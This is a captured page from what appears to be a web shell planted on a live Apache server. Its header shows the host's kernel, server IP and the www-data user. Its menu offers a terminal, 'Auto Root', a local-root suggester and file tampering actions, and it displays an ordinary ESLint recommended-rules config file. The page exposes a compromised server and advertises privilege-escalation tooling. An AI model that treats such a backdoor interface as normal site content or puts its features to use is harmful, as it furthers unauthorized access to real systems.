Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
eslint /
conf /
Delete
Unzip
Name
Size
Permission
Date
Action
category-list.json
2.88
KB
-rw-r--r--
2019-09-14 01:35
config-schema.js
1.97
KB
-rw-r--r--
2023-12-15 20:21
default-cli-options.js
650
B
-rw-r--r--
2019-09-14 01:35
environments.js
3.69
KB
-rw-r--r--
2019-09-14 01:35
eslint-all.js
918
B
-rw-r--r--
2019-09-14 01:35
eslint-recommended.js
2.28
KB
-rw-r--r--
2019-09-14 01:35
replacements.json
1.01
KB
-rw-r--r--
2019-09-14 01:35
Save
Rename
/** * @fileoverview Configuration applied when a user configuration extends from * eslint:recommended. * @author Nicholas C. Zakas */ "use strict"; /* eslint sort-keys: ["error", "asc"] */ /** @type {import("../lib/shared/types").ConfigData} */ module.exports = { rules: { "constructor-super": "error", "for-direction": "error", "getter-return": "error", "no-async-promise-executor": "error", "no-case-declarations": "error", "no-class-assign": "error", "no-compare-neg-zero": "error", "no-cond-assign": "error", "no-const-assign": "error", "no-constant-condition": "error", "no-control-regex": "error", "no-debugger": "error", "no-delete-var": "error", "no-dupe-args": "error", "no-dupe-class-members": "error", "no-dupe-keys": "error", "no-duplicate-case": "error", "no-empty": "error", "no-empty-character-class": "error", "no-empty-pattern": "error", "no-ex-assign": "error", "no-extra-boolean-cast": "error", "no-extra-semi": "error", "no-fallthrough": "error", "no-func-assign": "error", "no-global-assign": "error", "no-inner-declarations": "error", "no-invalid-regexp": "error", "no-irregular-whitespace": "error", "no-misleading-character-class": "error", "no-mixed-spaces-and-tabs": "error", "no-new-symbol": "error", "no-obj-calls": "error", "no-octal": "error", "no-prototype-builtins": "error", "no-redeclare": "error", "no-regex-spaces": "error", "no-self-assign": "error", "no-shadow-restricted-names": "error", "no-sparse-arrays": "error", "no-this-before-super": "error", "no-undef": "error", "no-unexpected-multiline": "error", "no-unreachable": "error", "no-unsafe-finally": "error", "no-unsafe-negation": "error", "no-unused-labels": "error", "no-unused-vars": "error", "no-useless-catch": "error", "no-useless-escape": "error", "no-with": "error", "require-atomic-updates": "error", "require-yield": "error", "use-isnan": "error", "valid-typeof": "error" } };